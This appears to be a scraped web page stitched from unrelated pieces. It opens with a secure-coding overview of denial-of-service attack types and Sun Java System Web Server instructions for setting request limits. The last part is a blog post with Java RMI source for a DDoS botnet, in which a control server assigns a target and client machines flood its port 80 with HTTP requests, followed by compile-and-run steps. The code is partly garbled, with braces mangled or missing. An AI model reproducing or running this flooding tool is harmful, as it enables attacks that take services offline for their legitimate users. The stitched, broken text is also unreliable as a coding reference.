Denial of Service
Denial-of-service (DoS) attacks attempt to make a computer resource unavailable or insufficiently available to its intended users. Distributed denial-of-service (DDoS) attacks are launched by two or more persons or bots. DoS and DDoS attacks are generally of greater concern for persistent, server-type systems than for desktop applications; nevertheless, denial of service issues can arise for all classes of application
There are several methods of causing a denial of service:
- Vulnerability attacks involve sending a few well-crafted packets that take advantage of an existing vulnerability in the target machine.
- Resource exhaustion attacks that consume computational resource such as bandwidth, memory, disk space, or processor time.
- Algorithmic attacks (such as on hash functions) by injecting values that force worst-case conditions to exist.
- Bandwidth consumption attacks that consume all available network bandwidth of the victim.
Denial of Service Through Resource Exhaustion
Denial of service can occur when resource usage is disproportionately large in comparison to the input data that causes the resource usage. Checking inputs for excessive resource consumption may be unjustified for client software that expects the user to handle resource-related problems. Even such client software, however, should check for inputs that could cause persistent denial of service, such as filling up the file system.
The Secure Coding Guidelines for the Java Programming Language [SCG 2009] lists some examples of possible attacks:
- Requesting a large image size for vector graphics, for instance, SVG and font files.
- «Zip bombs» whereby a short file is very highly compressed, for instance, ZIPs, GIFs and gzip encoded HTTP content.
- «Billion laughs attack» whereby XML entity expansion causes an XML document to grow dramatically during parsing. Set the XMLConstants.FEATURE_SECURE_PROCESSING feature to enforce reasonable limits.
- Using excessive disc space.
- Inserting many keys with the same hash code into a hash table, consequently triggering worst-case performance (O(n 2 )) rather than typical-case performance (O(n)).
- Initiating many connections where the server allocates significant resources for each, for instance, the traditional «SYN flood» attack.
Rules regarding prevention of denial of service attacks resulting from resource exhaustion include:
Preventing Your Server from Denial-of-Service attack
Denial-of-Service (DoS) attack is an explicit attempt to prevent legitimate users from using a service by some malicious users of the Server. Such an attack can be launched by:
Sun Java System Web Server can detect DoS attack by monitoring frequently accessed URI and denying request, if the request frequency is considerably high.
The following sections describes how you can prevent DoS attacks at the virtual server level.
Limiting Requests to The Server
You can now tweak the server to prevent Denial-Of-Service attacks by configuring request limits and monitoring maximum number of connections per virtual server. Configuring some of these values may affect the Server’s performance.
For configuring request limits for the server, click Configuration > Virtual Servers > Server Settings > Request Limits. Configure the parameters listed in the following table.
Description
Request Limits
Enable/Disable request limits for this virtual server. Request limits option is disabled by default.
Maximum Connections
Maximum number of concurrent connections allowed for this virtual server.
Maximum RPS
Maximum number of requests allowed from a client per second.
RPS Compute Interval
The time interval in which the average request per second (RPS) is calculated. Default values is 30 seconds.
Continue Condition
Determines what condition must be met in order for a blocked request type to become available again for servicing.
silence — Refused requests must fall to zero (over a subsequent interval) for service to resume.
threshold — Refused request rate must fall below RPS threshold for service to resume.
The default values is threshold.
The HTTP status code to use for blocked requests. The default code is HTTP 503 — Service Unavailable.
Monitor Attribute
An optional request attribute to monitor.
To limit the requests to the server through CLI, execute the following command.
wadm> enable-request-limits --user=admin --password-file=admin.pwd --host=serverhost --port=8989 --config=config1 --vs=config1_vs_1
To Limit the Maximum Number of Connections
You can limit the maximum number of concurrent connections. If a matching request is received while there are at least the specified number of requests being processed, the request is rejected. Note that the rejection of request is only for that particular time. As soon as concurrent requests drops below this limit new requests will be processed.
- Click Configuration tab.
- Select your configuration from the list.
- Select your virtual server under the Virtual Server tab.
- Click Server Settings > Request Limits.
- Enter a value for Maximum Connections section.
Denial of service java
We often hear about the word DOS attack on a site, and few people often think like DOS only means Disk Operating System. But, here DOS is something big, and we use it to crash and operational site by consuming the quote of daily or monthly or yearly requests of a site.
Here I would like to share a basic program using RMI based bots that will be helpful for reading purpose only. My intention is not to develop hacker but just to give an idea of using RMI in JAVA.
First we have created an interface that will be concreted in it’s implementation later. But, the main purpose behind creating this interface is just for RMI as the look up functionality of RMI needs an interface instead of complete implementation.
Now this time is just to provide an implementation of that interface:
import java.math.*;
import java.rmi.*;
import java.rmi.server.*;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
//
// DDOSServiceServer
//
// Server for a RMI service that calculates powers
//
public class DDOSServiceServer extends UnicastRemoteObject implements Runnable, DDOSService
< //Target Machine
final String TARGET = «wasif-pc»;
static DDOSServiceServer _instance;
public DDOSServiceServer () throws RemoteException
super();
>
// Calculate the square of a number
public String attack( )
throws RemoteException
_instance = new DDOSServiceServer ();
//2 threads on each machine
for (int i = 0; i < 2; i++)
new Thread(_instance).start();
String attack;
attack = «Attacking:»+ TARGET ;
return attack;
>
public void run() //1000 HTTP Requests using each client you can send more requests too
for (int i = 1; i < 1000; i++) try Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80.
sendRawLine(«GET / HTTP/1.1», net); // Sends the GET / OutputStream
sendRawLine(«Host: » + TARGET, net); // Sends Host: to the OutputStream
System.out.println(«Attacking on Target «+TARGET+» with Connection #: » + i);
> catch (UnknownHostException e) System.out.println(«DDoS.run: » + e);
> catch (IOException e) System.out.println(«DDoS.run: » + e);
>
>
>
public static void main ( String args[] ) throws Exception
// Assign a security manager, in the event that dynamic
// classes are loaded
// Create an instance of our power service server .
DDOSServiceServer svr = new DDOSServiceServer();
// . and bind it with the RMI Registry
Naming.bind («DDOSService», svr);
System.out.println («Service bound. «);
>
public static void sendRawLine(String text, Socket sock) try BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
out.write(text + » «);
out.flush();
> catch (IOException ex) ex.printStackTrace();
>
>
>
Till now we have almost done with our Server side code which we will be executing at our control panel machine from where we will be able to provide service to all those clients that will be waiting for our command. Actually here we have used RMI in reverse order as the clients are just acquiring the name of target machine from server. And once they got the name they start hitting it from their own machines.
As this code is just a day effort so probably need some further improvement too.
Now finally, we are at a stage to write the client side code that will be performing the actual task of sending fake requests to the client.
import java.rmi.*;
import java.rmi.Naming;
import java.io.*;
//
// DDOSServiceClient
//
public class DDOSServiceClient
String attack =»»; public static void main(String args[]) throws Exception
DDOSServiceClient obj = new DDOSServiceClient() ;
while(true) obj.attack =»»;
try obj.go();
>
catch(java.rmi.ConnectException rc) System.out.println(«Connection Failure»);
>
catch(java.net.ConnectException rc) System.out.println(«Net Failure»);
> catch(java.rmi.NotBoundException je) System.out.println(«java.rmi.NotBoundException»);
> System.out.println(obj.attack);
>
>
private static void go() throws Exception // Call registry for DDOSService
DDOSServiceClient obj = new DDOSServiceClient() ;
Thread.sleep(5000);
//A server IP that need to be replaced with this IP
DDOSService service = (DDOSService) Naming.lookup
(«rmi://192.168.55.44/DDOSService»);
DataInputStream din = new
DataInputStream (System.in);
//Calling remote Method
obj.attack = service.attack();
>
>
But in RMI we just need to compile in a bit different way. As it’s related to client-server communication so we must need a stub that will be used as a communication bridge in between client and a server.
When we are already done with the coding. So, now we need to compile and test it.
javac DDOSServiceClient.java
javac DDOSServiceServer.java
rmic DDOSServiceServer
start rmiregistry
java DDOSServiceServer on server machine
java DDOSServiceClient on client machine.
That’s it hope it will be helpful for many.